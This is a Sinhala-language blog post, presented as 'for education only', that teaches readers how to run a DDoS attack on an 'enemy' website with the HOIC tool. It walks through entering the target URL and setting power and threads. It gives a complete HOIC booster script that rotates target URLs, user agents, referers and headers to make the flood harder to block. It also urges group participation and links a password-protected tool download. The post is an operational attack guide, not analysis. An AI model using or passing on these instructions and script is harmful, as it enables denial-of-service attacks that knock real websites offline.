DDoS ඇටෑක් එකක් දෙමුද (අද්‍යාපනය සදහා පමණි)

 http://img.zerosecurity.org/files/2014/03/ddos-attack-protection-plan.jpg
 අපේ කොල්ලොන්ට වැදගත් පොස්ට් එකක් අරගෙන ඔන්න මම ආවා. මේක Education Only විතරයි. නැත්නම් මේක දුන්න කියලා මාව අල්ලන් යයි ( හික් ) කෝ ඉතින් මට ගානක්වත් නැහැනේ.
ගෙවී ගිය අවුරුදු කීපය තුළ දැවන්තම සයිබර් ප්‍රහාරය! හැබැයි එව්වනං ගැහුවෙ බොට් එහෙම දාලා. මෙකෙනුත් ගැහුවා FBI එකට. හෑ... මේ මොකක්ද කියන්නෙ?ඇයි කාටවත් කියන්න ඕන නෑනෙ DDoS ගැන, හැමෝම දැං ඕක ගැන දන්නවනෙ. හා කෙටියෙං කියන්නං මේකෙං කරන්නෙ වෙබ් අඩවියකට ට්‍රැෆික් එකක් දෙන එක. හැක් හොද දරුණු ට්‍රැෆික් එකක් අස්සෙං යන්න පුළුවන්ද? බෑනෙ. තා පහදන්න ඕනෙයි? බෑ මම දන්නෙ නෑ...
http://www.cnmeonline.com/wp-content/uploads/2013/03/29380_10_the_world_s_largest_ddos_attack_took_place_between_two_dutch_companies_saw_300gbps_peak_speeds_during_attack.jpg
බොට් නෙට් භාවිතා නොකර DDoS ගහන්න පුළුවන් හොදම ටූල් එකක් තමයි HOIC කියන්නෙ. මම HOIC වැඩකරන හැටි(සිද්ධාන්ත) දන්නෙ නෑ. ඒත්, වැඩ කරවගන්න හැටි කියාදෙන්නං. ඔයාටම කියලා PC එකක් හරි VPS එකක් තියෙනවනම් තවත් පහසුයි මොකද එක පාරින් පල්ලන් බස්සවන්න පුළුවන්නේ.
මුලිංම අවශ්‍යය හතුරු අඩවියේ ලිංකුව ගන්න. ලිංකුවේ http:// හෝ https:// තිබිය යුතුය. http://www.sinhalazone.info
පසුව HOIC රන් කරලා දකුණෙ පහල තියෙන “ + “ ලකුණ ඔබලා එන වින්ඩෝවෙ URL යටතෙ එම ලිංකුව Paste (Ctrl+V) කරන්න.


ඊළඟට Power යටතෙ ඔයාට අවශ්‍යය බලය දෙන්න. High තමා හොදම ඒත් ඔයාගෙ පරිගණකය ස්ලෝ වේවි. ඒක නිසා Medium දෙන්න. Booster එකක් දැම්මොත් තවත් සාර්ථකයි. අපිට ඒ පිළිබද දැනුමක් නෑ... ඒක එහෙම්මම තීන්න ඇරලා Add ඔබන්න.


මීළඟට THREADS ගාන දෙන්න. ප්‍රමාණෙ වැඩිවන තරමට තමා හොද. ඒත් පෙර පරිදිම ඔයාගෙ පරිගණකය ස්ලෝ වෙන්න පුළුවන්. ඒක නිසා 4-5ක් විතර ඇති.
හරි! දැං ප්‍රහාරය අරඹන්න. FIRE TEH LAZER! මත ඔබන්න. ( හික්)


https://m.ak.fbcdn.net/photos-g.ak/hphotos-ak-xap1/v/t1.0-0/10653751_594543297321656_2592652531380016724_n.jpg?oh=1b217f6b7ea0a5992651232f247c910a&oe=5488FFFA&__gda__=1421805094_0c8a3d0366efe83d98dfda1f5d0c1a7a

https://m.ak.fbcdn.net/photos-e.ak/hphotos-ak-xpa1/v/t1.0-0/10645063_594543987321587_6622133099487307958_n.jpg?oh=a0b2bbf0d07f50c00966b4f53e9a0f73&oe=548A4B5B&__gda__=1422342115_476d45f4caf4804ae5d1e9ca3801e2db



Booster එකක් දැම්මොත් හොදයි කීවනෙ දැං බලමු එයිංකක් හදන හැටි. පහත කෝඩ් එක බලන්න. දිගයි කරන්න දෙයක් නෑ...

Dim useragents() as String
Dim referers() as String
dim randheaders() as string
Dim randURLs() as string

// populate rotating urls
// IF YOU WANT TO IMPROVE THE ATTACK, ADD URLS BELONGING TO THIS DOMAIN OR RELATED SUBDOMAINS!!! PRO-TIP: You should create anew target and .HOIC file if u want to attack a different organization
randURLs.Append "http://www.sinhalazone.info"
randURLs.Append "http://www.sinhalazone.info/search/label/Bitcoin/"
randURLs.Append "http://www.sinhalazone.info/search/label/Security/"
randURLs.Append "http://www.sinhalazone.info/search/label/Blogger%20Tricks"


// rotate out url
URL = randURLs(RndNumber(0, randURLs.UBound))

// EDIT THE FOLLOWING STRINGS TO MAKE YOUR OWN BOOST UNIQUE AND THEREFORE MORE EVASIVE!

// populate list
useragents.Append "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6"
useragents.Append "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
useragents.Append "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
useragents.Append "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)"
useragents.Append "Mozilla/4.0 (compatible; MSIE 5.0; Windows NT 5.1; .NET CLR 1.1.4322)"
useragents.Append "Googlebot/2.1 ( http://www.googlebot.com/bot.html) "
useragents.Append "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Chrome/9.0.601.0 Safari/534.14"
useragents.Append "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Chrome/9.0.600.0 Safari/534.14"
useragents.Append "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.0 Safari/534.13"
useragents.Append "Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Ubuntu/10.04 Chromium/9.0.595.0 Chrome/9.0.595.0 Safari/534.13"
useragents.Append "Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 5.2; WOW64; .NET CLR 2.0.50727)"
useragents.Append "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.2; Trident/4.0; Media Center PC 4.0; SLCC1; .NET CLR 3.0.04320)"
useragents.Append "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; zh-cn) AppleWebKit/533.18.1 (KHTML, like Gecko) Version/5.0.2 Safari/533.18.5"
useragents.Append "Mozilla/5.0 (Windows; U; Windows NT 6.1; es-ES) AppleWebKit/533.18.1 (KHTML, like Gecko) Version/5.0 Safari/533.16"
useragents.Append "Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51"
useragents.Append "Mozilla/5.0 (Windows NT 5.1; U; Firefox/5.0; en; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 Opera 10.53"

// populate referer list
referers.Append "https://www.google.lk/search?q=sinhalazone"
referers.Append "https://www.google.lk/search?q=sinhalazone.info"



// Add random headers
randheaders.Append "Cache-Control: no-cache"
randheaders.Append "If-Modified-Since: Sat, 29 Oct 1994 11:59:59 GMT"
randheaders.Append "If-Modified-Since: Tue, 18 Sep 2002 10:34:27 GMT"
randheaders.Append "If-Modified-Since: Mon, 12 Aug 2004 12:54:49 GMT"
randheaders.Append "If-Modified-Since: Wed, 30 Jan 2000 01:21:09 GMT"
randheaders.Append "If-Modified-Since: Tue, 18 Aug 2006 08:49:15 GMT"
randheaders.Append "If-Modified-Since: Fri, 20 Oct 2006 09:34:27 GMT"
randheaders.Append "If-Modified-Since: Mon, 29 Oct 2001 05:17:09 GMT"
randheaders.Append "If-Modified-Since: Tue, 18 Apr 2003 12:54:49 GMT"
randheaders.Append "If-Modified-Since: Sat, 18 Aug 2002 12:54:49 GMT"
randheaders.Append "If-Modified-Since: Wed, 30 Jan 2000 01:21:09 GMT"
randheaders.Append "If-Modified-Since: Tue, 18 Aug 2009 08:49:15 GMT"
randheaders.Append "If-Modified-Since: Fri, 20 Jun 2006 09:34:27 GMT"
randheaders.Append "If-Modified-Since: Sun, 13 Oct 2007 11:59:59 GMT"
randheaders.Append "If-Modified-Since: Tue, 18 Aug 2003 12:54:49 GMT"
randheaders.Append "If-Modified-Since: Wed, 30 Jan 2002 01:21:09 GMT"
randheaders.Append "If-Modified-Since: Tue, 18 Aug 2009 08:49:15 GMT"
randheaders.Append "If-Modified-Since: Fri, 20 Oct 2008 09:34:27 GMT"
randheaders.Append "If-Modified-Since: Mon, 29 Oct 2007 11:59:59 GMT"
randheaders.Append "If-Modified-Since: Tue, 18 Aug 2001 12:54:49 GMT"

Headers.Append "Keep-Alive: 115"
Headers.Append "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7"
Headers.Append "Connection: keep-alive"

// ------------------ DO NOT EDIT BELOW THIS LINE

// generate random referer
Headers.Append "Referer: " + referers(RndNumber(0, referers.UBound))
// generate random user agent (DO NOT MODIFY THIS LINE)
Headers.Append "User-Agent: " + useragents(RndNumber(0, useragents.UBound))
// Generate random headers
Headers.Append randheaders(RndNumber(0, randheaders.UBound))

ඔය කොඩිං ඒකේ // populate rotating urls යටතෙ තිබෙන randURLs.Append ඉදිරියේ දැක්වෙන පරිදි " " ලෙස කමා තුළ හතුරු අඩවියේ ලිංකු දාන්න ඕන.
උදා:- sinhalazone.hoic
අඩවියේ ප්‍රධාන ලිංකුව, ලේබල් ලිංකු, පේජ් ලිංකු.... වැනි දෑ
අපිට ඕන හැටියෙ ඔතන randURLs.Append ලෙස පේළි දමමිං හතුරු අඩවියේ ඕනෑම ලිංකු ප්‍රමාණයක් ඇතුලක් කළ හැක. වෙබ් අඩවි scan කරන එව්වයිං ඔය හැම ලිංකුවක්ම ගත හැකි. එයිං හොදම එක තමා Acunetix Web Vulnerability Scanner (මේ තීන්නෙ මම චැනල් 4ට ගත්තු ලිංකු ඕන කෙනෙක් ඉන්නවනං මෙහෙයුම ආයෙ පටං ගන්න.)


ඊළඟට තිබෙන // populate referer list යටතෙ එම අඩවිය රෙෆ(ර්) කරන ගූගල් සර්ච් එනිජිම, නැතිනං වෙනත් අඩවි එක් කරන්න පුළුවන්. ඒකියන්නෙ ගූගල්හි විවිධ ලෙස සෙවුම් දමමිං ලිංකු ඇතුළත් කරන්න පුළුවන්.
https://m.ak.fbcdn.net/photos-c.ak/hphotos-ak-xpa1/v/t1.0-0/10610552_594544383988214_4845738163826736248_n.jpg?oh=495c044cfbd7e1f88a5bbe843970a8e0&oe=54C3248D&__gda__=1421724213_07ac347abed7a0df8d287790e1901483


කලිං පරිදි referers.Append ඉදිරියේ " " ලෙස කමා යොදා ඕනෑ තරම් ලිංකු යෙදිය හැක.
ඉවරයි.

ආ මේ ඕක නෝට් පෑඩ් එකේ කරලා .hoic විදියට සේව් කර ගන්න ඇ.
උදා:- sinhalazone.hoic

එහෙම සේව් කරලා hoic.exe ෆයිල් එක තීන ෆෝල්ඩර් එකටම ඒක දාන්න. දැං පෙර පරිදිම URL, Power අනං මනං හදලා හතුරු .hoic එකත් තෝරලා දෙන්න.


 https://m.ak.fbcdn.net/photos-a.ak/hphotos-ak-xpa1/v/t1.0-0/10653603_594542067321779_2047785309499315945_n.jpg?oh=fa0e616d82b11a906ce4d41d5a7da744&oe=54876AB6&__gda__=1418145550_7ae36f080cc26479ba9698f9c476017d
තනියෙං කල්ලා අඩිවියක් හිට්ටන්න බෑ ඈ. කට්ටිය හැකිතාක් වැඩිවෙන තරමට තමා සාර්ථක.

ආ මෙන්න අහුවුණොත් දඩේ හූ ඇ. රතුපාටිං කොටු කරලා තීන්නෙ.

image

එහෙනම් මෙතනින් DDOS Tool එක බාගන්න.
http://www.tinylanka.ml/up/888c681c01a4645bb29b83a1fb4e284f.gif
  ( Password - sinhalazone )
මේ වගේ ලිපියක් ලියන්න මාස ගානක් යන නිසා අපේ සිංහලHelp ෆෝරම්  එකේ Lahiru විසින් ලියපු පොස්ට් එක උපුටලා අරගෙන තමා ඔයාලට දුන්නේ. මේවගේ වැදගත් ලිපියක් අරගෙන අපහු එනවෝ.

අපිට Like එකක් දාලා Follow කරන්න අමතක කරන්න එපා.

Related Posts:

Disqus Comments
© 2017 Web Sinhalen - Template Created by Harindu Jayakody - Proudly powered by Blogger